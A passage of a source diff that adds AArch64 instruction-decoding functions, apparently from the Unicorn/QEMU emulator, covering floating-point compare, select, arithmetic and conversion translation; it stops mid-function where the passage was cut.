disas_data_proc_reg(DisasContext *s, uint32_t insn) +{ + switch (extract32(insn, 24, 5)) { + case 0x0a: /* Logical (shifted register) */ + disas_logic_reg(s, insn); + break; + case 0x0b: /* Add/subtract */ + if (insn & (1 << 21)) { /* (extended register) */ + disas_add_sub_ext_reg(s, insn); + } else { + disas_add_sub_reg(s, insn); + } + break; + case 0x1b: /* Data-processing (3 source) */ + disas_data_proc_3src(s, insn); + break; + case 0x1a: + switch (extract32(insn, 21, 3)) { + case 0x0: /* Add/subtract (with carry) */ + disas_adc_sbc(s, insn); + break; + case 0x2: /* Conditional compare */ + disas_cc(s, insn); /* both imm and reg forms */ + break; + case 0x4: /* Conditional select */ + disas_cond_select(s, insn); + break; + case 0x6: /* Data-processing */ + if (insn & (1 << 30)) { /* (1 source) */ + disas_data_proc_1src(s, insn); + } else { /* (2 source) */ + disas_data_proc_2src(s, insn); + } + break; + default: + unallocated_encoding(s); + break; + } + break; + default: + unallocated_encoding(s); + break; + } +} + +static void handle_fp_compare(DisasContext *s, bool is_double, + unsigned int rn, unsigned int rm, + bool cmp_with_zero, bool signal_all_nans) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_flags = tcg_temp_new_i64(tcg_ctx); + TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx); + + if (is_double) { + TCGv_i64 tcg_vn, tcg_vm; + + tcg_vn = read_fp_dreg(s, rn); + if (cmp_with_zero) { + tcg_vm = tcg_const_i64(tcg_ctx, 0); + } else { + tcg_vm = read_fp_dreg(s, rm); + } + if (signal_all_nans) { + gen_helper_vfp_cmped_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); + } else { + gen_helper_vfp_cmpd_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); + } + tcg_temp_free_i64(tcg_ctx, tcg_vn); + tcg_temp_free_i64(tcg_ctx, tcg_vm); + } else { + TCGv_i32 tcg_vn, tcg_vm; + + tcg_vn = read_fp_sreg(s, rn); + if (cmp_with_zero) { + tcg_vm = tcg_const_i32(tcg_ctx, 0); + } else { + tcg_vm = read_fp_sreg(s, rm); + } + if (signal_all_nans) { + gen_helper_vfp_cmpes_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); + } else { + gen_helper_vfp_cmps_a64(tcg_ctx, tcg_flags, tcg_vn, tcg_vm, fpst); + } + tcg_temp_free_i32(tcg_ctx, tcg_vn); + tcg_temp_free_i32(tcg_ctx, tcg_vm); + } + + tcg_temp_free_ptr(tcg_ctx, fpst); + + gen_set_nzcv(tcg_ctx, tcg_flags); + + tcg_temp_free_i64(tcg_ctx, tcg_flags); +} + +/* C3.6.22 Floating point compare + * 31 30 29 28 24 23 22 21 20 16 15 14 13 10 9 5 4 0 + * +---+---+---+-----------+------+---+------+-----+---------+------+-------+ + * | M | 0 | S | 1 1 1 1 0 | type | 1 | Rm | op | 1 0 0 0 | Rn | op2 | + * +---+---+---+-----------+------+---+------+-----+---------+------+-------+ + */ +static void disas_fp_compare(DisasContext *s, uint32_t insn) +{ + unsigned int mos, type, rm, op, rn, opc, op2r; + + mos = extract32(insn, 29, 3); + type = extract32(insn, 22, 2); /* 0 = single, 1 = double */ + rm = extract32(insn, 16, 5); + op = extract32(insn, 14, 2); + rn = extract32(insn, 5, 5); + opc = extract32(insn, 3, 2); + op2r = extract32(insn, 0, 3); + + if (mos || op || op2r || type > 1) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + handle_fp_compare(s, type, rn, rm, opc & 1, opc & 2); +} + +/* C3.6.23 Floating point conditional compare + * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 3 0 + * +---+---+---+-----------+------+---+------+------+-----+------+----+------+ + * | M | 0 | S | 1 1 1 1 0 | type | 1 | Rm | cond | 0 1 | Rn | op | nzcv | + * +---+---+---+-----------+------+---+------+------+-----+------+----+------+ + */ +static void disas_fp_ccomp(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int mos, type, rm, cond, rn, op, nzcv; + TCGv_i64 tcg_flags; + int label_continue = -1; + + mos = extract32(insn, 29, 3); + type = extract32(insn, 22, 2); /* 0 = single, 1 = double */ + rm = extract32(insn, 16, 5); + cond = extract32(insn, 12, 4); + rn = extract32(insn, 5, 5); + op = extract32(insn, 4, 1); + nzcv = extract32(insn, 0, 4); + + if (mos || type > 1) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + if (cond < 0x0e) { /* not always */ + int label_match = gen_new_label(tcg_ctx); + label_continue = gen_new_label(tcg_ctx); + arm_gen_test_cc(tcg_ctx, cond, label_match); + /* nomatch: */ + tcg_flags = tcg_const_i64(tcg_ctx, nzcv << 28); + gen_set_nzcv(tcg_ctx, tcg_flags); + tcg_temp_free_i64(tcg_ctx, tcg_flags); + tcg_gen_br(tcg_ctx, label_continue); + gen_set_label(tcg_ctx, label_match); + } + + handle_fp_compare(s, type, rn, rm, false, op); + + if (cond < 0x0e) { + gen_set_label(tcg_ctx, label_continue); + } +} + +/* copy src FP register to dst FP register; type specifies single or double */ +static void gen_mov_fp2fp(DisasContext *s, int type, int dst, int src) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (type) { + TCGv_i64 v = read_fp_dreg(s, src); + write_fp_dreg(s, dst, v); + tcg_temp_free_i64(tcg_ctx, v); + } else { + TCGv_i32 v = read_fp_sreg(s, src); + write_fp_sreg(s, dst, v); + tcg_temp_free_i32(tcg_ctx, v); + } +} + +/* C3.6.24 Floating point conditional select + * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 0 + * +---+---+---+-----------+------+---+------+------+-----+------+------+ + * | M | 0 | S | 1 1 1 1 0 | type | 1 | Rm | cond | 1 1 | Rn | Rd | + * +---+---+---+-----------+------+---+------+------+-----+------+------+ + */ +static void disas_fp_csel(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int mos, type, rm, cond, rn, rd; + int label_continue = -1; + + mos = extract32(insn, 29, 3); + type = extract32(insn, 22, 2); /* 0 = single, 1 = double */ + rm = extract32(insn, 16, 5); + cond = extract32(insn, 12, 4); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + + if (mos || type > 1) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + if (cond < 0x0e) { /* not always */ + int label_match = gen_new_label(tcg_ctx); + label_continue = gen_new_label(tcg_ctx); + arm_gen_test_cc(tcg_ctx, cond, label_match); + /* nomatch: */ + gen_mov_fp2fp(s, type, rd, rm); + tcg_gen_br(tcg_ctx, label_continue); + gen_set_label(tcg_ctx, label_match); + } + + gen_mov_fp2fp(s, type, rd, rn); + + if (cond < 0x0e) { /* continue */ + gen_set_label(tcg_ctx, label_continue); + } +} + +/* C3.6.25 Floating-point data-processing (1 source) - single precision */ +static void handle_fp_1src_single(DisasContext *s, int opcode, int rd, int rn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr fpst; + TCGv_i32 tcg_op; + TCGv_i32 tcg_res; + + fpst = get_fpstatus_ptr(tcg_ctx); + tcg_op = read_fp_sreg(s, rn); + tcg_res = tcg_temp_new_i32(tcg_ctx); + + switch (opcode) { + case 0x0: /* FMOV */ + tcg_gen_mov_i32(tcg_ctx, tcg_res, tcg_op); + break; + case 0x1: /* FABS */ + gen_helper_vfp_abss(tcg_ctx, tcg_res, tcg_op); + break; + case 0x2: /* FNEG */ + gen_helper_vfp_negs(tcg_ctx, tcg_res, tcg_op); + break; + case 0x3: /* FSQRT */ + gen_helper_vfp_sqrts(tcg_ctx, tcg_res, tcg_op, tcg_ctx->cpu_env); + break; + case 0x8: /* FRINTN */ + case 0x9: /* FRINTP */ + case 0xa: /* FRINTM */ + case 0xb: /* FRINTZ */ + case 0xc: /* FRINTA */ + { + TCGv_i32 tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(opcode & 7)); + + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + gen_helper_rints(tcg_ctx, tcg_res, tcg_op, fpst); + + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + break; + } + case 0xe: /* FRINTX */ + gen_helper_rints_exact(tcg_ctx, tcg_res, tcg_op, fpst); + break; + case 0xf: /* FRINTI */ + gen_helper_rints(tcg_ctx, tcg_res, tcg_op, fpst); + break; + default: + abort(); + } + + write_fp_sreg(s, rd, tcg_res); + + tcg_temp_free_ptr(tcg_ctx, fpst); + tcg_temp_free_i32(tcg_ctx, tcg_op); + tcg_temp_free_i32(tcg_ctx, tcg_res); +} + +/* C3.6.25 Floating-point data-processing (1 source) - double precision */ +static void handle_fp_1src_double(DisasContext *s, int opcode, int rd, int rn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr fpst; + TCGv_i64 tcg_op; + TCGv_i64 tcg_res; + + fpst = get_fpstatus_ptr(tcg_ctx); + tcg_op = read_fp_dreg(s, rn); + tcg_res = tcg_temp_new_i64(tcg_ctx); + + switch (opcode) { + case 0x0: /* FMOV */ + tcg_gen_mov_i64(tcg_ctx, tcg_res, tcg_op); + break; + case 0x1: /* FABS */ + gen_helper_vfp_absd(tcg_ctx, tcg_res, tcg_op); + break; + case 0x2: /* FNEG */ + gen_helper_vfp_negd(tcg_ctx, tcg_res, tcg_op); + break; + case 0x3: /* FSQRT */ + gen_helper_vfp_sqrtd(tcg_ctx, tcg_res, tcg_op, tcg_ctx->cpu_env); + break; + case 0x8: /* FRINTN */ + case 0x9: /* FRINTP */ + case 0xa: /* FRINTM */ + case 0xb: /* FRINTZ */ + case 0xc: /* FRINTA */ + { + TCGv_i32 tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(opcode & 7)); + + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + gen_helper_rintd(tcg_ctx, tcg_res, tcg_op, fpst); + + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + break; + } + case 0xe: /* FRINTX */ + gen_helper_rintd_exact(tcg_ctx, tcg_res, tcg_op, fpst); + break; + case 0xf: /* FRINTI */ + gen_helper_rintd(tcg_ctx, tcg_res, tcg_op, fpst); + break; + default: + abort(); + } + + write_fp_dreg(s, rd, tcg_res); + + tcg_temp_free_ptr(tcg_ctx, fpst); + tcg_temp_free_i64(tcg_ctx, tcg_op); + tcg_temp_free_i64(tcg_ctx, tcg_res); +} + +static void handle_fp_fcvt(DisasContext *s, int opcode, + int rd, int rn, int dtype, int ntype) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + switch (ntype) { + case 0x0: + { + TCGv_i32 tcg_rn = read_fp_sreg(s, rn); + if (dtype == 1) { + /* Single to double */ + TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); + gen_helper_vfp_fcvtds(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); + write_fp_dreg(s, rd, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_rd); + } else { + /* Single to half */ + TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); + gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); + /* write_fp_sreg is OK here because top half of tcg_rd is zero */ + write_fp_sreg(s, rd, tcg_rd); + tcg_temp_free_i32(tcg_ctx, tcg_rd); + } + tcg_temp_free_i32(tcg_ctx, tcg_rn); + break; + } + case 0x1: + { + TCGv_i64 tcg_rn = read_fp_dreg(s, rn); + TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); + if (dtype == 0) { + /* Double to single */ + gen_helper_vfp_fcvtsd(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); + } else { + /* Double to half */ + gen_helper_vfp_fcvt_f64_to_f16(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); + /* write_fp_sreg is OK here because top half of tcg_rd is zero */ + } + write_fp_sreg(s, rd, tcg_rd); + tcg_temp_free_i32(tcg_ctx, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_rn); + break; + } + case 0x3: + { + TCGv_i32 tcg_rn = read_fp_sreg(s, rn); + tcg_gen_ext16u_i32(tcg_ctx, tcg_rn, tcg_rn); + if (dtype == 0) { + /* Half to single */ + TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); + gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); + write_fp_sreg(s, rd, tcg_rd); + tcg_temp_free_i32(tcg_ctx, tcg_rd); + } else { + /* Half to double */ + TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); + gen_helper_vfp_fcvt_f16_to_f64(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); + write_fp_dreg(s, rd, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_rd); + } + tcg_temp_free_i32(tcg_ctx, tcg_rn); + break; + } + default: + abort(); + } +} + +/* C3.6.25 Floating point data-processing (1 source) + * 31 30 29 28 24 23 22 21 20 15 14 10 9 5 4 0 + * +---+---+---+-----------+------+---+--------+-----------+------+------+ + * | M | 0 | S | 1 1 1 1 0 | type | 1 | opcode | 1 0 0 0 0 | Rn | Rd | + * +---+---+---+-----------+------+---+--------+-----------+------+------+ + */ +static void disas_fp_1src(DisasContext *s, uint32_t insn) +{ + int type = extract32(insn, 22, 2); + int opcode = extract32(insn, 15, 6); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + + switch (opcode) { + case 0x4: case 0x5: case 0x7: + { + /* FCVT between half, single and double precision */ + int dtype = extract32(opcode, 0, 2); + if (type == 2 || dtype == type) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + + handle_fp_fcvt(s, opcode, rd, rn, dtype, type); + break; + } + case 0x0: case 0x1: case 0x2: case 0x3: + case 0x8: case 0x9: case 0xa: case 0xb: case 0xc: + case 0xe: case 0xf: + /* 32-to-32 and 64-to-64 ops */ + switch (type) { + case 0: + if (!fp_access_check(s)) { + return; + } + + handle_fp_1src_single(s, opcode, rd, rn); + break; + case 1: + if (!fp_access_check(s)) { + return; + } + + handle_fp_1src_double(s, opcode, rd, rn); + break; + default: + unallocated_encoding(s); + } + break; + default: + unallocated_encoding(s); + break; + } +} + +/* C3.6.26 Floating-point data-processing (2 source) - single precision */ +static void handle_fp_2src_single(DisasContext *s, int opcode, + int rd, int rn, int rm) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tcg_op1; + TCGv_i32 tcg_op2; + TCGv_i32 tcg_res; + TCGv_ptr fpst; + + tcg_res = tcg_temp_new_i32(tcg_ctx); + fpst = get_fpstatus_ptr(tcg_ctx); + tcg_op1 = read_fp_sreg(s, rn); + tcg_op2 = read_fp_sreg(s, rm); + + switch (opcode) { + case 0x0: /* FMUL */ + gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x1: /* FDIV */ + gen_helper_vfp_divs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x2: /* FADD */ + gen_helper_vfp_adds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x3: /* FSUB */ + gen_helper_vfp_subs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x4: /* FMAX */ + gen_helper_vfp_maxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x5: /* FMIN */ + gen_helper_vfp_mins(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x6: /* FMAXNM */ + gen_helper_vfp_maxnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x7: /* FMINNM */ + gen_helper_vfp_minnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x8: /* FNMUL */ + gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + gen_helper_vfp_negs(tcg_ctx, tcg_res, tcg_res); + break; + } + + write_fp_sreg(s, rd, tcg_res); + + tcg_temp_free_ptr(tcg_ctx, fpst); + tcg_temp_free_i32(tcg_ctx, tcg_op1); + tcg_temp_free_i32(tcg_ctx, tcg_op2); + tcg_temp_free_i32(tcg_ctx, tcg_res); +} + +/* C3.6.26 Floating-point data-processing (2 source) - double precision */ +static void handle_fp_2src_double(DisasContext *s, int opcode, + int rd, int rn, int rm) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_op1; + TCGv_i64 tcg_op2; + TCGv_i64 tcg_res; + TCGv_ptr fpst; + + tcg_res = tcg_temp_new_i64(tcg_ctx); + fpst = get_fpstatus_ptr(tcg_ctx); + tcg_op1 = read_fp_dreg(s, rn); + tcg_op2 = read_fp_dreg(s, rm); + + switch (opcode) { + case 0x0: /* FMUL */ + gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x1: /* FDIV */ + gen_helper_vfp_divd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x2: /* FADD */ + gen_helper_vfp_addd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x3: /* FSUB */ + gen_helper_vfp_subd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x4: /* FMAX */ + gen_helper_vfp_maxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x5: /* FMIN */ + gen_helper_vfp_mind(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x6: /* FMAXNM */ + gen_helper_vfp_maxnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x7: /* FMINNM */ + gen_helper_vfp_minnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x8: /* FNMUL */ + gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + gen_helper_vfp_negd(tcg_ctx, tcg_res, tcg_res); + break; + } + + write_fp_dreg(s, rd, tcg_res); + + tcg_temp_free_ptr(tcg_ctx, fpst); + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + tcg_temp_free_i64(tcg_ctx, tcg_res); +} + +/* C3.6.26 Floating point data-processing (2 source) + * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 0 + * +---+---+---+-----------+------+---+------+--------+-----+------+------+ + * | M | 0 | S | 1 1 1 1 0 | type | 1 | Rm | opcode | 1 0 | Rn | Rd | + * +---+---+---+-----------+------+---+------+--------+-----+------+------+ + */ +static void disas_fp_2src(DisasContext *s, uint32_t insn) +{ + int type = extract32(insn, 22, 2); + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int rm = extract32(insn, 16, 5); + int opcode = extract32(insn, 12, 4); + + if (opcode > 8) { + unallocated_encoding(s); + return; + } + + switch (type) { + case 0: + if (!fp_access_check(s)) { + return; + } + handle_fp_2src_single(s, opcode, rd, rn, rm); + break; + case 1: + if (!fp_access_check(s)) { + return; + } + handle_fp_2src_double(s, opcode, rd, rn, rm); + break; + default: + unallocated_encoding(s); + } +} + +/* C3.6.27 Floating-point data-processing (3 source) - single precision */ +static void handle_fp_3src_single(DisasContext *s, bool o0, bool o1, + int rd, int rn, int rm, int ra) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tcg_op1, tcg_op2, tcg_op3; + TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); + TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx); + + tcg_op1 = read_fp_sreg(s, rn); + tcg_op2 = read_fp_sreg(s, rm); + tcg_op3 = read_fp_sreg(s, ra); + + /* These are fused multiply-add, and must be done as one + * floating point operation with no rounding between the + * multiplication and addition steps. + * NB that doing the negations here as separate steps is + * correct : an input NaN should come out with its sign bit + * flipped if it is a negated-input. + */ + if (o1 == true) { + gen_helper_vfp_negs(tcg_ctx, tcg_op3, tcg_op3); + } + + if (o0 != o1) { + gen_helper_vfp_negs(tcg_ctx, tcg_op1, tcg_op1); + } + + gen_helper_vfp_muladds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_op3, fpst); + + write_fp_sreg(s, rd, tcg_res); + + tcg_temp_free_ptr(tcg_ctx, fpst); + tcg_temp_free_i32(tcg_ctx, tcg_op1); + tcg_temp_free_i32(tcg_ctx, tcg_op2); + tcg_temp_free_i32(tcg_ctx, tcg_op3); + tcg_temp_free_i32(tcg_ctx, tcg_res); +} + +/* C3.6.27 Floating-point data-processing (3 source) - double precision */ +static void handle_fp_3src_double(DisasContext *s, bool o0, bool o1, + int rd, int rn, int rm, int ra) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_op1, tcg_op2, tcg_op3; + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx); + + tcg_op1 = read_fp_dreg(s, rn); + tcg_op2 = read_fp_dreg(s, rm); + tcg_op3 = read_fp_dreg(s, ra); + + /* These are fused multiply-add, and must be done as one + * floating point operation with no rounding between the + * multiplication and addition steps. + * NB that doing the negations here as separate steps is + * correct : an input NaN should come out with its sign bit + * flipped if it is a negated-input. + */ + if (o1 == true) { + gen_helper_vfp_negd(tcg_ctx, tcg_op3, tcg_op3); + } + + if (o0 != o1) { + gen_helper_vfp_negd(tcg_ctx, tcg_op1, tcg_op1); + } + + gen_helper_vfp_muladdd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_op3, fpst); + + write_fp_dreg(s, rd, tcg_res); + + tcg_temp_free_ptr(tcg_ctx, fpst); + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + tcg_temp_free_i64(tcg_ctx, tcg_op3); + tcg_temp_free_i64(tcg_ctx, tcg_res); +} + +/* C3.6.27 Floating point data-processing (3 source) + * 31 30 29 28 24 23 22 21 20 16 15 14 10 9 5 4 0 + * +---+---+---+-----------+------+----+------+----+------+------+------+ + * | M | 0 | S | 1 1 1 1 1 | type | o1 | Rm | o0 | Ra | Rn | Rd | + * +---+---+---+-----------+------+----+------+----+------+------+------+ + */ +static void disas_fp_3src(DisasContext *s, uint32_t insn) +{ + int type = extract32(insn, 22, 2); + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int ra = extract32(insn, 10, 5); + int rm = extract32(insn, 16, 5); + bool o0 = extract32(insn, 15, 1); + bool o1 = extract32(insn, 21, 1); + + switch (type) { + case 0: + if (!fp_access_check(s)) { + return; + } + handle_fp_3src_single(s, o0, o1, rd, rn, rm, ra); + break; + case 1: + if (!fp_access_check(s)) { + return; + } + handle_fp_3src_double(s, o0, o1, rd, rn, rm, ra); + break; + default: + unallocated_encoding(s); + } +} + +/* C3.6.28 Floating point immediate + * 31 30 29 28 24 23 22 21 20 13 12 10 9 5 4 0 + * +---+---+---+-----------+------+---+------------+-------+------+------+ + * | M | 0 | S | 1 1 1 1 0 | type | 1 | imm8 | 1 0 0 | imm5 | Rd | + * +---+---+---+-----------+------+---+------------+-------+------+------+ + */ +static void disas_fp_imm(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int imm8 = extract32(insn, 13, 8); + int is_double = extract32(insn, 22, 2); + uint64_t imm; + TCGv_i64 tcg_res; + + if (is_double > 1) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + /* The imm8 encodes the sign bit, enough bits to represent + * an exponent in the range 01....1xx to 10....0xx, + * and the most significant 4 bits of the mantissa; see + * VFPExpandImm() in the v8 ARM ARM. + */ + if (is_double) { + imm = (extract32(imm8, 7, 1) ? 0x8000 : 0) | + (extract32(imm8, 6, 1) ? 0x3fc0 : 0x4000) | + extract32(imm8, 0, 6); + imm <<= 48; + } else { + imm = (extract32(imm8, 7, 1) ? 0x8000 : 0) | + (extract32(imm8, 6, 1) ? 0x3e00 : 0x4000) | + (extract32(imm8, 0, 6) << 3); + imm <<= 16; + } + + tcg_res = tcg_const_i64(tcg_ctx, imm); + write_fp_dreg(s, rd, tcg_res); + tcg_temp_free_i64(tcg_ctx, tcg_res); +} + +/* Handle floating point <=> fixed point conversions. Note that we can + * also deal with fp <=> integer conversions as a special case (scale == 64) + * OPTME: consider handling that special case specially or at least skipping + * the call to scalbn in the helpers for zero shifts. + */ +static void handle_fpfpcvt(DisasContext *s, int rd, int rn, int opcode, + bool itof, int rmode, int scale, int sf, int type) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + bool is_signed = !(opcode & 1); + bool is_double = type; + TCGv_ptr tcg_fpstatus; + TCGv_i32 tcg_shift; + + tcg_fpstatus = get_fpstatus_ptr(tcg_ctx); + + tcg_shift = tcg_const_i32(tcg_ctx, 64 - scale); + + if (itof) { + TCGv_i64 tcg_int = cpu_reg(s, rn); + if (!sf) { + TCGv_i64 tcg_extend = new_tmp_a64(s); + + if (is_signed) { + tcg_gen_ext32s_i64(tcg_ctx, tcg_extend, tcg_int); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_extend, tcg_int); + } + + tcg_int = tcg_extend; + } + + if (is_double) { + TCGv_i64 tcg_double = tcg_temp_new_i64(tcg_ctx); + if (is_signed) { + gen_helper_vfp_sqtod(tcg_ctx, tcg_double, tcg_int, + tcg_shift, tcg_fpstatus); + } else { + gen_helper_vfp_uqtod(tcg_ctx, tcg_double, tcg_int, + tcg_shift, tcg_fpstatus); + } + write_fp_dreg(s, rd, tcg_double); + tcg_temp_free_i64(tcg_ctx, tcg_double); + } else { + TCGv_i32 tcg_single = tcg_temp_new_i32(tcg_ctx); + if (is_signed) { + gen_helper_vfp_sqtos(tcg_ctx, tcg_single, tcg_int, + tcg_shift, tcg_fpstatus); + } else { + gen_helper_vfp_uqtos(tcg_ctx, tcg_single, tcg_int, + tcg_shift, tcg_fpstatus); + } + write_fp_sreg(s, rd, tcg_single); + tcg_temp_free_i32(tcg_ctx, tcg_single); + } + } else { + TCGv_i64 tcg_int = cpu_reg(s, rd); + TCGv_i32 tcg_rmode; + + if (extract32(opcode, 2, 1)) { + /* There are too many rounding modes to all fit into rmode, + * so FCVTA[US] is a special case. + */ + rmode = FPROUNDING_TIEAWAY; + } + + tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); + + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + + if (is_double) { + TCGv_i64 tcg_double = read_fp_dreg(s, rn); + if (is_signed) { + if (!sf) { + gen_helper_vfp_tosld(tcg_ctx, tcg_int, tcg_double, + tcg_shift, tcg_fpstatus); + } else { + gen_helper_vfp_tosqd(tcg_ctx, tcg_int, tcg_double, + tcg_shift, tcg_fpstatus); + } + } else { + if (!sf) { + gen_helper_vfp_tould(tcg_ctx, tcg_int, tcg_double, + tcg_shift, tcg_fpstatus); + } else { + gen_helper_vfp_touqd(tcg_ctx, tcg_int, tcg_double, + tcg_shift, tcg_fpstatus); + } + } + tcg_temp_free_i64(tcg_ctx, tcg_double); + } else { + TCGv_i32 tcg_single = read_fp_sreg(s, rn); + if (sf) { + if (is_signed) { + gen_helper_vfp_tosqs(tcg_ctx, tcg_int, tcg_single, + tcg_shift, tcg_fpstatus); + } else { + gen_helper_vfp_touqs(tcg_ctx, tcg_int, tcg_single, + tcg_shift, tcg_fpstatus); + } + } else { + TCGv_i32 tcg_dest = tcg_temp_new_i32(tcg_ctx); + if (is_signed) { + gen_helper_vfp_tosls(tcg_ctx, tcg_dest, tcg_single, + tcg_shift, tcg_fpstatus); + } else { + gen_helper_vfp_touls(tcg_ctx, tcg_dest, tcg_single, + tcg_shift, tcg_fpstatus); + } + tcg_gen_extu_i32_i64(tcg_ctx, tcg_int, tcg_dest); + tcg_temp_free_i32(tcg_ctx, tcg_dest); + } + tcg_temp_free_i32(tcg_ctx, tcg_single); + } + + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_int, tcg_int); + } + } + + tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_shift); +} + +/* C3.6.29 Floating point <-> fixed point conversions + * 31 30 29 28 24 23 22 21 20 19 18 16 15 10 9 5 4 0 + * +----+---+---+-----------+------+---+-------+--------+-------+------+------+ + * | sf | 0 | S | 1 1 1 1 0 | type | 0 | rmode | opcode | scale | Rn | Rd | + * +----+---+---+-----------+------+---+-------+--------+-------+------+------+ + */ +static void disas_fp_fixed_conv(DisasContext *s, uint32_t insn) +{ + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int scale = extract32(insn, 10, 6); + int opcode = extract32(insn, 16, 3); + int rmode = extract32(insn, 19, 2); + int type = extract32(insn, 22, 2); + bool sbit = extract32(insn, 29, 1); + bool sf = extract32(insn, 31, 1); + bool itof; + + if (sbit || (type > 1) + || (!sf && scale < 32)) { + 